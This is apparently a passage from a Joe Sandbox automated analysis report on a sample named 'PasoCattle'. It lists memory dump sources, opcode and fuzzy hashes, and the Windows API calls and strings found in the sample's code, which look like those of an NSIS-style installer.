                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                          • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                          • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                          • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                          • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                            • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                          • API String ID: 20674999-2124804629
                                                                                                                                                                          • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                          • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                          • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                          • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                          APIs
                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                            • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                          • String ID: F$N$open
                                                                                                                                                                          • API String ID: 3928313111-1104729357
                                                                                                                                                                          • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                          • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                          • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                          • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                          • API String ID: 565278875-3368763019
                                                                                                                                                                          • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                          • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                          • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                          • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                          APIs
                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                          • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                          • String ID: F
                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                          • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                          • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                          • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                          • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                          • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          Strings
                                                                                                                                                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                          • API String ID: 1641139501-220328614
                                                                                                                                                                          • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                          • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                          • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                          • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                          • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                          • API String ID: 3734993849-3206598305
                                                                                                                                                                          • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                          • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                          • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                          • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                          Strings
                                                                                                                                                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                          • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                          • API String ID: 3294113728-3145124454
                                                                                                                                                                          • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                          • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                          • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                          • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,771B23A0,00000000), ref: 00404FD6
